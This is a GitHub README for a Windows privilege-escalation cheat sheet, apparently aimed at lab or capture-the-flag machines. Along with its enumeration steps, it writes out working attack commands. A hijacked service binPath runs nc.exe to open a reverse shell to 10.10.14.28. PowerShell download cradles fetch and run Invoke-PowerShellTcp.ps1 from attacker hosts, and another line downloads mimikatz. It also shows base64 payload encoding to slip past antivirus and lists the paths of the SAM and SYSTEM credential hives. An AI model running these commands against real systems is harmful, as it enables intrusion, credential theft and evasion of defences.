Skip to content

dealbreaker973/windows-privilege-escalation-cheat-sheet

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

7 Commits
 
 
 
 

Repository files navigation

Made By J3wker

██╗ ██╗██████╗ ██╗ ██╗██╗ ██╗███████╗██████╗ ██╗ ██╔╝ ██║╚════██╗██║ ██║██║ ██╔╝██╔════╝██╔══██╗ ╚██╗ ██╔╝█████╗ ██║ █████╔╝██║ █╗ ██║█████╔╝ █████╗ ██████╔╝█████╗╚██╗ ╚██╗╚════╝██ ██║ ╚═══██╗██║███╗██║██╔═██╗ ██╔══╝ ██╔══██╗╚════╝██╔╝ ╚██╗ ╚█████╔╝██████╔╝╚███╔███╔╝██║ ██╗███████╗██║ ██║ ██╔╝ ╚═╝ ╚════╝ ╚═════╝ ╚══╝╚══╝ ╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚═╝

BEFORE STARTING !! if system before 2012 - try juciypotato use systeminfo | google the system and update version - look for CVE's and kernel Exploits. If nothing found start the check list.

Check List:


  1. use windows-exploit-suggester.py

systeminfo > sys.txt

Transfer sys.txt to kali and use this with the python script.

Example:

python windows-exploit-suggester.py --database 2019-10-11-mssb.xls --systeminfo sys.txt

In order to get the database file do python windows-exploit-suggester.py --update


NOTE: List files you saw when you enumerated the web and looked intersering. Example:

secret.php db.php auth.php

Read them after getting a basic shell - might have creds in them if so net user try the creds against users - maybe it matches.

Example: runas /user:Administrator cmd.exe Check running process

  1. ps
Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize

remmber PID of weird process Write it down and use 2. netstat -ano Check for open ports - google that port - what is it ?

see Users 3. net user

see specific username information / groups 4. net user username - which group is he in ? Logs reader ? read logs - maybe passwords hidden, maybe automatic script the read logs inject command!, part of "Remote Management Group" ? maybe use WinRM

  1. check Credentials mananger:

dir C:\Users\username\AppData\Local\Microsoft\Credentials\ dir C:\Users\username\AppData\Roaming\Microsoft\Credentials\ cmdkey /list if is has keys try:

Domain could be also Hostname or just use username alone runas /user:DOMAIN\Username /savecred command

if that doesnt work - try Meterpreter load incognito- maybe impersonate to a certain user

  1. check Documents folder
  2. check Downloads folder
  3. check Program Files (x86) folder
  4. check Program Files folder
  5. check AppData folder and etc Local - LocalLow - Roaming

Look for werid files and installed programs - look for exploits in them.


  1. check services with write access - to change binpath

accesschk.exe -accepteula -uvwc *

Example:

  1. sc config usosvc binPath="C:\Windows\System32\spool\drivers\color\nc.exe 10.10.14.28 9001 -e cmd.exe" $ Start a listener on port 9001
  2. sc stop usosvc
  3. sc start usosvc
  4. get a shell.

  1. Check for files like .txt / .php - read them. check for automated scripts that are waiting for scertain files for example:

"Admin is waiting for PDF drop it in C:\Docs" - create a Malicious PDF - drop it

  1. Look for backups files SAM.bak - SYSTEM.bak/ windows image backup.
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system
  1. What Groups are on the system? net localgroup

  2. Unquoated services ? if so hijack it!

wmic service get name,displayname,pathname,startmode 2>nul |findstr /i "Auto" 2>nul |findstr /i /v "C:\Windows\\" 2>nul |findstr /i /v """
  1. What scheduled tasks are there? Anything custom implemented?

schtasks /query /fo LIST 2>nul | findstr TaskName

or in powershell:

Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State

  1. what is running on startup ?

wmic startup get caption,command

  1. Permissions on specific folders ?
icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "Everyone"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "Everyone"

NOTE: Change the value of "Everyone" to your desire. example:

icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
  1. If you have user Creds and WinRM is open try:

NOTE: Change Values $user and $pw to match your case.

$user = 'SNIPER\Chris'
$pw = '36mEAhz/B8xQ~2VM'
$secpw = ConvertTo-SecureString $pw -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential $user,$secpw

Possible to convert into one-liner:

$user = 'SNIPER\Chris';$pw = '36mEAhz/B8xQ~2VM';$secpw = ConvertTo-SecureString $pw -AsPlainText -Force;$cred = New-Object System.Management.Automation.PSCredential $user,$secpw

and then:

Invoke-Command -Computer localhost -Credential $cred -ScriptBlock {command}

Get command at the user you prompted

  1. If WinRM isn't available do the same to store creds but use
Start-Process -FilePath "powershell.exe" -Argumentlist "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.8/Invoke-PowerShellTcp.ps1')" -Credential $cred
  1. Wanna Download something?
IEX(New-Object Net.WebClient).downloadString('URL')
(New-Object Net.WebClient).DownloadFile('http://10.10.14.28/mimikatz.exe', 'mimikatz.exe')
  1. AV on ? Command Filtering ?
cat Invoke-PowerShellTcp.ps1 | iconv -t UTF-16LE | base64 -w0 | xclip -selection clipboard

or with a command in plain-text:

echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.28/Invoke-PowerShellAdmin.ps1')" | iconv -t UTF-16LE | base64 -w 0 | xclip -selection clipboard

to execute the output use

powershell -enc

exmaple : Note - not real output of base64 made it shorter for example.

powershell -enc AMAAuADEANAAuADIAOAAvAEkAbgB2AG8AawBlAC0AUABvAHcAZQByAFMAaABlAGwAbABBAGQAbQB

About

Updating on a daily base.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published